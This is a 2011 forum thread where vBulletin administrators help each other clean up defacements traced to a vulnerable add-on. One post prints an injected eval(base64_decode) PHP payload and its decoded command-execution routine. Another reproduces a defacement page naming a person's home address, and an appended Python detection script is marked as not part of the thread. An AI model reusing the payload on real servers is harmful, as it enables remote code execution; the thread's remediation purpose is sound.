Hacked by Team Animus?


Valter
05-05-2011, 02:02 PM
If your forum has been hacked by "Team Animus", please read this to get help removing hacking traces and making your forum secure.

NOTE: Please be careful when removing any data. Make sure you have backups of your important files and databases!

What they did:
1. Added vba.php to INCLUDES folder
2. Replaced several index.php files, added some index.html files
3. Added new user with ID "13371338", admin status
4. Changed user titles to "Hacked by Team Animus"
5. Disabled current admins
6. Disabled forums

Here is what I have done:
01. MyAdmin > Deleted latest user (hacker - admin group)
02. MyAdmin > Changed autoincrement value in USER table to {LatestUserID} + 1
03. MyAdmin > Executed two queries to fix user titles:
UPDATE user SET usertitle = replace(usertitle, "Hacked by Team Animus", "");
UPDATE user SET customtitle = '0' where customtitle = '1';
04. FTP > To be sure that all files are OK, I've deleted everything from my forum folder, except:
images, banners, .htaccess, favicon, config.php (re-checked content of this one, just in case)
05. FTP > Uploaded original forum files + custom .php's which belong to add-ons I'm using
06. FTP > Uploaded tools.php, restored my admin status, enabled forums
07. FTP > Deleted tools.php and /install/install.php
08. ACP > Removed "Skimlinks Plugin" (who installed this? hacker?) - Edit: added by vB in 4.1.3
09. ACP > Updated "VSa - Advanced Forum Rules" add-on (download latest version: vB3.x (https://vborg.vbsupport.ru/showthread.php?t=201312), vB4.x (https://vborg.vbsupport.ru/showthread.php?t=236069))
10. ACP > Re-imported all add-ons I'm using, with "overwrite" checked, to ensure there are no modified codes
11. ACP > Maintenance > update user titles, fix broken user profiles, repair and optimize tables


If you have any questions, feel free to ask.

And again: Make sure you have backups of your important files and databases before you delete anything!

RCKSTR
05-05-2011, 02:15 PM
ok, so I went to

user>operations>changed the user number to be correct>hit "go"

And it reverts right back to the 13371341

Any ideas?

Valter
05-05-2011, 02:19 PM
It should be {LatestUserID} + 1.

Check user ID of your latest regular user (sort rows by user id desc). Let's say it's 456.
Go to USER table > Operations > change AUTO_INCREMENT to 457.

RCKSTR
05-05-2011, 02:22 PM
Never mind, I missed 3 new registrants.

Valter
05-05-2011, 02:43 PM
I'm still wondering how they added files.

There must be something more than Forum Rules add-on.

Boofo
05-05-2011, 03:54 PM
If they breached the db because of the exploit it would be nothing to get to the server from there, I would think.

Oh, and this is legit:

08. ACP > Removed "Skimlinks Plugin" (who installed this? hacker?)

It was added in 4.1.3, I think.

Eplexx
05-05-2011, 04:08 PM
Great share, I wasn't attacked thank god.

Zachery
05-05-2011, 05:23 PM
Not every site had the same things done to it, honestly. Having cleaned a number of them, lots of different things were done to different sites; not all steps were done to all of the sites. It would be in your best interests to RESTORE A BACKUP, or contact vBulletin support for help.

wraggster
05-05-2011, 08:45 PM
my forum has also been hacked by 2 different groups, one just did a quick and simple redirect, the other has for the moment taken control and somehow they are redirecting everything to their server, my server admin isn't around at the moment so I'm totally at a loss how to kill them off

I've been hacked by http://pro2leet.net/forum.php and http://belegit.net/forum/ and both these sites use vbulletin software

AusPhotography
05-05-2011, 10:35 PM
We were lucky in that (Australian time) the hack attack occurred in the early morning but after our daily 3am backup.

I changed passwords, I deleted all the newly updated files, I replaced them from original source, restored from the 3am backup - all good.
We only lost a handful of threads and posts, but it was the safest option IMHO.

Lessons?
1. Have a daily backup!
2. Have all the source code safe somewhere else.
3. Take more time to eyeball add-on code

Note: Valter's code has been around for years. NO ONE noticed the problem until now.

It's very easy to visually check all form fields and SQL in an addon; checking that vB cleaning and escape_string have been applied.
We (Admins) all need to be vigilant, no point blaming anyone, TeamAnimus have done us a favour by making us take security seriously.
Not that I would object to tasking Seal Team 6 onto TeamAnimus :D


Kym

--------------- Added 1304639047 at 1304639047 ---------------

my forum has also been hacked by 2 different groups, one just did a quick and simple redirect, the other has for the moment taken control and somehow they are redirecting everything to their server, my server admin isn't around at the moment so I'm totally at a loss how to kill them off

I've been hacked by http://pro2leet.net/forum.php and http://belegit.net/forum/ and both these sites use vbulletin software

Once the vba.php trojan is there, anyone can use it to hack your system. :eek:
Sounds like a piggy back attack to me. :(

EuroBeat2
05-06-2011, 03:16 AM
I've got hacked. I hope I got it back, but for some reason my "user titles" are gone. Like "junior fellow" "senior fellow" etc. Any suggestion? I tried to repair tables etc, but to no avail.

Tx

EB

Frosty
05-06-2011, 03:22 AM
I'm still wondering how they added files.

There must be something more than Forum Rules add-on.

After they got into the Admin Panel they could have easily added a plugin which would allow them to upload something to the site, i.e. a PHP shell for modifying the current files, or uploading newer files.

SilentSleeper
05-06-2011, 05:13 AM
I've got hacked. I hope I got it back, but for some reason my "user titles" are gone. Like "junior fellow" "senior fellow" etc. Any suggestion? I tried to repair tables etc, but to no avail.

Tx

EB
1. Go into phpMyAdmin or connect via SSH
2. Open table user
3. Run SQL query
UPDATE user SET customtitle = '0' where customtitle = '1'
4. Then: Update the counters - Update User Titles and Ranks

Kangaroo666
05-08-2011, 03:33 AM
Thanks for all your help Valter.

0ptima
05-09-2011, 01:42 AM
Was everyone who got hacked using the Advanced Forum Rules?

Suiram
05-10-2011, 02:33 PM
Was everyone who got hacked using the Advanced Forum Rules?

i was only using that mod and the vb forums - nothing else. so to me, it's clear what it was. lesson learned. i will never use another mod again. yes, really.

The Realist
05-10-2011, 04:57 PM
Since updating this poor mod Cyb - Advanced Forums Rules I've followed the above and all looked great until today.

Came home from work and I could not find my forum, so I FTPed in and all my files, the lot, have been removed and the site is now no more. Team Animus were the original hackers but I think they installed a backdoor and then regained access and deleted the lot.

Not happy because I'm not running any backups locally and am hoping my host has backups.

May reupload vBulletin fresh and hope the database is OK.

Regards

TheLastSuperman
05-10-2011, 05:34 PM
Since updating this poor mod Cyb - Advanced Forums Rules I've followed the above and all looked great until today.

That mod is not "poor"; in fact, as other staff members have posted recently about this subject, the code has been there for years and was only just now discovered as an exploit. The same thing can be said about countless other software. Do you see vBulletin being sued for someone not patching their site when an exploit is found? No; in fact everyone knows or should know it falls on you and solely you if not patched. Furthermore, that's just simply not fair to say despite what you're going through. YOU installed it, correct? Don't get me wrong, I'm not saying you can't feel "wronged"; I'm simply saying if you point that anger towards someone it should not be Valter's mod you've been using and enjoying for a while now, it should be those who defaced your site respectively.

The Realist
05-10-2011, 07:17 PM
Point taken.

That mod is not "poor"; in fact, as other staff members have posted recently about this subject, the code has been there for years and was only just now discovered as an exploit. The same thing can be said about countless other software. Do you see vBulletin being sued for someone not patching their site when an exploit is found? No; in fact everyone knows or should know it falls on you and solely you if not patched. Furthermore, that's just simply not fair to say despite what you're going through. YOU installed it, correct? Don't get me wrong, I'm not saying you can't feel "wronged"; I'm simply saying if you point that anger towards someone it should not be Valter's mod you've been using and enjoying for a while now, it should be those who defaced your site respectively.

GRJoker
05-11-2011, 07:24 PM
When I try to run the query, it does not allow me to do so. Where exactly do you have to go to run the query?

borbole
05-11-2011, 07:27 PM
When I try to run the query, it does not allow me to do so. Where exactly do you have to go to run the query?

I assume you tried to run it from your ACP, right? You should enter your uid in the "can run queries" part of the config.php file to be able to run queries from your ACP.

Anyway, you can also run the query at the SQL box at your phpmyadmin in the CP of your host.

Bulldog Stang
05-12-2011, 12:45 AM
I have now been hacked twice. I followed the stated guidelines and updated my CYB - Advanced Forum Rules as well. I have checked all files in FTP and removed any new ones. Also checked the db and deleted the new user.

I do not know what else to do here.

AusPhotography
05-12-2011, 02:25 AM
We were attacked again today. Similar attack, but slightly different payload.
VSa - Advanced Forum Rules is the latest version, so I think there is another hole maybe in another plugin.

vijayninel
05-12-2011, 03:22 AM
We were attacked again today. Similar attack, but slightly different payload.
VSa - Advanced Forum Rules is the latest version, so I think there is another hole maybe in another plugin.

What other plugins do you have? Are you sure they didn't leave any backdoors for them to come back the last time they hacked you?

AusPhotography
05-12-2011, 04:29 AM
I have several other plugins.
I restored from a backup and re-loaded all scripts and removed vsa.php index.html etc.

The new payload concerns me, similar but different. It did include vsa.php (again)

<head>
<title>hack by liut</title>
<script src="party.js"></script>
</head>
<body bgcolor="black">
<br/><br/>
<center>
<font color="white">make sur u turn up ur speakers so u can here me talk about the hack n express my opinions. btw i hacked slq injector db decriptin passwrds rite now :)</font>
<img src="http://i.imgur.com/QBquY.jpg" />
<object width="0" height="0">
<param name="movie" value="http://www.youtube.com/v/3a56LO3heac&autoplay=1&amp;hl=en_GB&amp;fs=1?color1=0x234900&amp;color2=0x 4e9e00"></param>
<param name="allowFullScreen" value="true"></param>
<param name="allowscriptaccess" value="always"></param>
<embed src="http://www.youtube.com/v/3a56LO3heac&autoplay=1&amp;hl=en_GB&amp;fs=1?color1=0x234900&amp;color2=0x 4e9e00" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="0" height="0">
</embed>
</object>
<object width="0" height="0">
<param name="movie" value="http://www.youtube.com/v/Xi5ZUVP62Iw&autoplay=1&amp;hl=en_GB&amp;fs=1?color1=0x234900&amp;color2=0x 4e9e00"></param>
<param name="allowFullScreen" value="true"></param>
<param name="allowscriptaccess" value="always"></param>
<embed src="http://www.youtube.com/v/Xi5ZUVP62Iw&autoplay=1&amp;hl=en_GB&amp;fs=1?color1=0x234900&amp;color2=0x 4e9e00" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="0" height="0">
</embed>
</object>
<font color="white">Phillip S Roberts<br />
14 Prince's St N<br/>
Exeter, Devon EX2 9AL, UK<br/>
i dar u 2 com get me u lil pussies i been doin mma for 4 months i can tak u</font>
</center>
</body>
</html>


--------------- Added 1305183220 at 1305183220 ---------------

I just found that I had the first fixed version, not the 2nd. Damn!

DeanoUK
05-12-2011, 08:59 AM
Yep I've been hacked for the second time too - like the first time I didn't have that user or the vsa.php files etc. Just turned my forum off and removed my admin rights.

I've turned off all extensions for now, while this story pans out.

Infopro
05-12-2011, 09:33 AM
You guys should check your own computers for issues. Are you using an FTP client that stores your passwords in plain text? Are you using SFTP for connecting to your server?

kh99
05-12-2011, 09:37 AM
I think I've noticed another potential problem in Advanced Forum Rules. I've sent a PM to Valter but haven't heard back yet (is there someone else I should contact?)

borbole
05-12-2011, 01:26 PM
I think I've noticed another potential problem in Advanced Forum Rules. I've sent a PM to Valter but haven't heard back yet (is there someone else I should contact?)

I think in such cases you can contact the admins here.

RCKSTR
05-13-2011, 08:23 PM
Just got the quarantine email, again

madshark
05-13-2011, 09:18 PM
Ugh! Again? I just got the email as well. Wonder what's wrong now? >< Poor Valter.

CK
05-13-2011, 09:32 PM
I keep reading "hacked by team Anus".

kh99
05-13-2011, 09:37 PM
I think in such cases you can contact the admins here.

For future reference, don't PM. I'm told the correct thing to do would have been to click on "Report this Post" in the mod thread.

Suiram
05-13-2011, 11:36 PM
I have now been hacked twice. I followed the stated guidelines and updated my CYB - Advanced Forum Rules as well. I have checked all files in FTP and removed any new ones. Also checked the db and deleted the new user.

I do not know what else to do here.

you, me and many others.
uninstall this rotten back door to hell. it is now without a doubt that it has not been fixed, no matter the claims. it's getting to the point where you have to wonder if it's some kind of conspiracy or something. :mad: :down:
it is not a case where they breached before and were "waiting". i was only hacked after i upgraded to v4.0.4 and not before.

UNINSTALL ANY AND ALL MODS - PERIOD!!

Boofo
05-13-2011, 11:42 PM
Removing all mods is a little extreme, don't you think?

g0dfather1984
05-13-2011, 11:52 PM
Removing all mods is a little extreme, don't you think?

While I do understand your frustration about everything, I kind of agree with Boofo here. Uninstalling every mod is a little extreme.

Suiram
05-14-2011, 12:29 AM
yeah, sure. i suppose you could change that to all cyb mods.
but in my case i only ever used one mod. the cyb afr one. i uninstalled it and also decided to keep my vb forum vanilla. apart from changing colors and stuff from within it, that is it for me. lesson learned. i'm too much a control freak to allow myself to be "violated" again. :P (one rape is enough)

aquariumpros
05-14-2011, 12:29 AM
you, me and many others.
uninstall this rotten back door to hell. ...

UNINSTALL ANY AND ALL MODS - PERIOD!!

Might want to try to understand that ANY AND ALL code is susceptible to exploits - hence the reason there are always updates and patches offered (even for operating systems, and vBulletin core software, etc.).


If you were hacked again - you didn't completely purge the server of the exploitable code.

Ensure that all copies of vba.php have been removed:
/forum/includes/vba.php
/forum/includes/xml/vba.php


Also - check (or get your host to check) your server logs for access.

Also - do a full scan of the database; as we had base64 data encoded into the database in the rtable field within the guest table.


Entries I removed:

| guestid | hostip | useragent | lastactive | spider | script | rdata |


| 85fbda11bb0d353a5b4db40ad309b0dc | 88.80.207.132 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b | 1301678740 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZW NobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0i ZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZC k7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2Zl KXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaW YoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNm ZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQ plbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykp ew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZW lmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0 YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZX RfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVs c2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG 9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0g QG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw 0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3Blbigk Y2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZi gkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBw Y2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));di e();";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i:0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| f7b4a57131b4887a2a1eea92376e9697 | 205.204.32.194 | Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320) | 1302083349 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZW NobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0i ZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZC k7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2Zl KXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaW YoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNm ZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQ plbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykp ew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZW lmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0 YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZX RfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVs c2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG 9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0g QG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw 0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3Blbigk Y2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZi gkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBw Y2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));di e();";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i:0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| f8b72c4b4b12138accc7f62c2692ce98 | 183.99.33.109 | Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) | 1305032315 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZW NobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0i ZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZC k7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2Zl KXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaW YoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNm ZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQ plbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykp ew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZW lmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0 YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZX RfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVs c2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG 9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0g QG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw 0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3Blbigk Y2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZi gkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBw Y2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));di e();";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i:0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0:"";} |



One way people make mass changes of that nature is to use a mass defacer script. In part, the code I removed from the database did allow for PHP or shell commands to be executed without placing files into the account.

One occurrence was at: Tue May 10 07:58:35 CDT 2011 by this IP: 183.99.33.109


echo "v0pCr3w
";
echo "sys:".php_uname()."
";
$cmd="echo nob0dyCr3w";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
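
As an added example (not part of the post above): a Python triage script that finds the eval(base64_decode(...)) wrapper in stored request data, decodes it even when an export has split the base64 with spaces, and lists the command-execution functions the decoded PHP calls. The row keys host, lastactivity and data, the helper names and the sample rows are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from datetime import datetime, timezone

# eval(base64_decode('...')); whitespace is tolerated inside the blob because
# forum software and database exports often wrap long strings.
WRAPPER = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]", re.I)
# Serialized-PHP key and declared length of the value that holds the wrapper.
FIELD = re.compile(r's:\d+:"([^"]*)";s:(\d+):"$')
# PHP functions that run OS commands; the decoded payload above tries several.
EXEC_CALL = re.compile(
    r"\b(exec|shell_exec|system|passthru|popen|proc_open)\s*\(", re.I)


def decode_blob(blob):
    """Strip whitespace, repair padding, return the decoded text or None."""
    compact = re.sub(r"\s+", "", blob)
    compact += "=" * (-len(compact) % 4)
    try:
        raw = base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", "replace")


def triage_row(row):
    """Return one finding per eval/base64 wrapper found in row['data']."""
    findings = []
    for m in WRAPPER.finditer(row["data"]):
        field = FIELD.search(row["data"][:m.start()])
        decoded = decode_blob(m.group(1))
        seen = datetime.fromtimestamp(row["lastactivity"], tz=timezone.utc)
        findings.append({
            "host": row["host"],
            "seen_utc": seen.isoformat(),
            "field": field.group(1) if field else None,
            "declared_len": int(field.group(2)) if field else None,
            "exec_funcs": sorted(
                {f.lower() for f in EXEC_CALL.findall(decoded or "")}),
            "decoded": decoded,
        })
    return findings


def triage(rows):
    """Flatten findings for every row, oldest request first."""
    hits = [f for row in rows for f in triage_row(row)]
    return sorted(hits, key=lambda f: f["seen_utc"])


def wrap(text, width=50):
    """Insert a space every `width` characters, like a wrapped dump."""
    return " ".join(text[i:i + width] for i in range(0, len(text), width))


# Constructed sample rows; row keys are assumed names for this example and
# the addresses are documentation ranges (RFC 5737).
SAMPLE_PHP = (b"echo 'marker'; if (function_exists('system')) "
              b"{ @system($c); } else { @shell_exec($c); }")
SAMPLE_VALUE = "eval(base64_decode('%s'));die();" % wrap(
    base64.b64encode(SAMPLE_PHP).decode())
SAMPLE_ROWS = [
    {"host": "192.0.2.10", "lastactivity": 1305000000,
     "data": 'a:2:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:%d:"%s";}'
             % (len(SAMPLE_VALUE), SAMPLE_VALUE)},
    {"host": "198.51.100.7", "lastactivity": 1305000600,
     "data": 'a:1:{s:11:"author_name";s:5:"Alice";}'},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_ROWS):
        print(hit["seen_utc"], hit["host"], hit["field"],
              hit["declared_len"], hit["exec_funcs"])
```

A name field whose declared length runs to hundreds of bytes is itself worth alerting on, which is why the finding carries declared_len alongside the decoded text.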

A Dead Puppie
05-14-2011, 12:44 AM
Anyone who was using the old version of the Advanced Forum Rules mod, any version, could/was suspect to hackers. There is a fixed update somewhere. Best thing to do is uninstall the mod, remove all files from the server, and re-upload the updated version.

Boofo
05-14-2011, 12:57 AM
Might want to try to understand that ANY AND ALL code is susceptible to exploits - hence the reason there are always updates and patches offered (even for operating systems, and vBulletin core software, etc.).

I don't necessarily agree with the idea that ALL code is susceptible to exploits. It depends on what the code does.

aquariumpros
05-14-2011, 01:11 AM
I don't necessarily agree with the idea that ALL code is susceptible to exploits. It depends on what the code does.
Sorry for the misinterpretation. What I intended to convey was that it's NOT just hacks and mods that are susceptible to being hacked...so removing all mods won't unilaterally make a site safe. This exploit could just as easily have been found in the base vBulletin code; or even an exploit in coding within the server OS, etc.

Vigilance in keeping up to date on ALL software patches & updates is still needed to have any real security; and even then - there's ALWAYS a risk.

Daily back-ups is your only real security.

madshark
05-14-2011, 01:59 AM
I keep reading "hacked by team Anus".

Haha that would be appropriate wouldn't it? lol At least some of us still see a lighter side.

Just let's not jump at the developer's throat, like aquariumpros said the issue could've come from anywhere. It's unfortunate that it was Valter who was the one in the primary line of fire this time. Fundamentally the web is worse than reality as far as safety is concerned so what more do we argue from there?

Boofo is right. Not everything is evil but there is always someone trying to better something that causes an addition that is slightly overlooked. But if we said ok Windows 98 is the shit we don't need to go anywhere from here or worse if Apple said ok iMac that's it we've done perfect let's not screw it up where would we be today?

In that same light no add-ons at all would be similar to saying ok I'm born. I'm vanilla there are viruses and germs out there so I'm going to build a sanitized glass orb and live in it the rest of my life. But in a funny kind of way VB allows backups that make risks a little manageable. Life doesn't really give us that option in the ideal form does it? Something to ponder. Make use of it I'm sure it's been said a gazillion times before.

Boofo
05-14-2011, 02:18 AM
You also have to remember how long Valter's mod was out before it got exploited. All it takes is someone playing around with something long enough to find a way around certain things. Valter is an excellent coder that caught an unlucky break that could happen to any one of us.

AusPhotography
05-14-2011, 03:47 AM
You also have to remember how long Valter's mod was out before it got exploited. All it takes is someone playing around with something long enough to find a way around certain things. Valter is an excellent coder that caught an unlucky break that could happen to any one of us.

+100

Boofo
05-14-2011, 04:03 AM
+100

Well, it couldn't happen to me, but it could happen to all the rest of the coders. ;)

TheLastSuperman
05-14-2011, 04:15 AM
Well, it couldn't happen to me, but it could happen to all the rest of the coders. ;)

So true ;).

:p

Nickbe
05-14-2011, 06:33 AM
After they got into the Admin Panel they could have easily add a plugin which would allow them to upload something on the site, i.e php shell for modifying of the current files, or uploading of the newer files.

Would that allow them to upload outside of the forum directory? That is what they did to me. The forum directory resides within my public_html (user/public_html/forums) they uploaded files to (user/public_html). I suspect this issue goes deeper than everybody thinks.

TheLastSuperman
05-14-2011, 06:37 AM
Would that allow them to upload outside of the forum directory? That is what they did to me. The forum directory resides within my public_html (user/public_html/forums) they uploaded files to (user/public_html). I suspect this issue goes deeper than everybody thinks.

If they upload a shell type of script then it's pretty much out the door imo.

http://en.wikipedia.org/wiki/Shell_script

madshark
05-14-2011, 06:41 AM
Lol Boofo. But that's the thing with people. You'd use something for years and the minute something goes wrong you scream and shout and burn it to the ground. Sad reality.

Nickbe, from following the issue quite closely: if they get into the SQL, from there uploading content etc. to your home directory is peanuts apparently (if I recall that bit of info correctly). Well fundamentally it's the maximum that can be done, isn't it? Unless it escalates to your hosts and whole server getting hacked. That is unlikely I suspect? A vulnerability always results in either losing admin rights of a board, your files being erased or your account used to host the hacker's files on the sly. But this seems to be more of a bragging rights venture by the looks of it? I guess all the small time hackers will pick up on the yet unpatched board and continue the mischief.

fxwoody
05-14-2011, 10:04 AM
Ok so they can hack the plugin to find a hole and get into the SQL or so....yes??
I was checking Valter's plugin and now it's quarantine, what happened now with it????

Should we disable it or is there a way that Valter will fix it ?!?!?

Can't post in the thread for news :(

Cheers

madshark
05-14-2011, 12:13 PM
Yes essentially that's what I understood reading the posts.

It was quarantined yesterday because someone seems to have found another exploit (a few pages back on this thread I think) even with the latest update. I'd suggest disabling it in the least if you have a large/well known board. I just copied over my rules and uninstalled it completely for now. That dumps the SQL tables as well as I didn't want to risk it.

He will fix it no doubt. The first time around the fix came within a few hours. But there doesn't seem to be any Valter activity yet. He could just be busy elsewhere.

Yeah once it's quarantined it gets locked. I ended up here for the same reason.

AusPhotography
05-14-2011, 12:16 PM
I'm not convinced Advanced Forum Rules is the attack vector for the latest round. Sites that have never used it have reportedly been attacked.

Retracted. :o

I found a hole in the cookie handling code due to the use of the PHP eval function.
I.e. the hacker pre-sets a cookie to contain malicious code, and the eval function runs it when it picks up the cookie content (that it was expecting to be something else).


Kym

kh99
05-14-2011, 12:32 PM
He will fix it no doubt. The first time around the fix came within a few hours. But there doesn't seem to be any Valter activity yet. He could just be busy elsewhere.

Valter responded to my PM this morning, it's been fixed and it's awaiting reactivation (or whatever they call it). But yeah, if you have the latest installed it should be disabled now I would think. I don't think you'd actually have to uninstall it because when you disable it the plugins are inactive.

I'm not convinced Advanced Forum Rules is the attack vector for the latest round. Sites that have never used it have reportedly been attacked.


That's right, I haven't seen any evidence that this mod was actually used for any attack (not that I've looked that hard - maybe on vbulletin.com?).

As for the "uninstall all mods" person, if you want your server to be safe from hacking unplug it from the internet (and keep it in a locked room).

Zachery
05-14-2011, 12:54 PM
Not a single site I have done repair work on was missing the specific mod in question. Not a single site I repaired had no modifications.

kh99
05-14-2011, 12:58 PM
Well, fair enough - that's a pretty strong argument.

Disasterpiece
05-14-2011, 02:30 PM
Ok so they can hack the plugin to find a hole and get into the SQL or so....yes??
I was checking Valter's plugin and now it's quarantine, what happened now with it????

Should we disable it or is there a way that Valter will fix it ?!?!?

Can't post in the thread for news :(

Cheers

I reported the mod yesterday because I found the exploit.

And with the user table info on the 3rd page I even know how they got in there :D
interesting. It feels like solving a murder case ^^

borbole
05-14-2011, 02:40 PM
It feels like solving a murder case ^^

Gut gemacht Inspector Derrick :D

Frosty
05-14-2011, 04:15 PM
Would that allow them to upload outside of the forum directory? That is what they did to me. The forum directory resides within my public_html (user/public_html/forums) they uploaded files to (user/public_html). I suspect this issue goes deeper than everybody thinks.

Hey Nickbe,
They could have firstly uploaded the shell to the forum dir, and then upload another one (because php shells allow browsing of the directories on a certain web hosting account) in another writeable directory.

So yeah, even if they manage to get into your admin panel, and if you have no writeable directories you're pretty much safe.

Zachery
05-14-2011, 04:56 PM
That is not completely true, really depends on the server's setup and configuration.

ChromeDome
05-15-2011, 02:36 AM
Is "VSa - Advanced Registration" safe?

TheLastSuperman
05-15-2011, 04:18 AM
I do want to make one thing perfectly clear!

If you find that a currently installed modification on your site is "Quarantined" or "Discontinued" or in the "Modification Graveyard" for any sort of security issue you need to disable the modification IMMEDIATELY.

You don't want to uninstall unless you truly do not want the functionality otherwise when it's patched/fixed and you update all of your rules are gone or if it was a "Thanks" mod for example all of your thanks would be removed as you uninstalled.

fxwoody
05-15-2011, 09:03 AM
Tks for all the info's guys! Much appreciated ;)

Seems like this one will make others talk as some might have weaknesses also that have not yet been approached?!?
Tho, even with a good alarm system, if they want to steal, they will find a way loll ;)

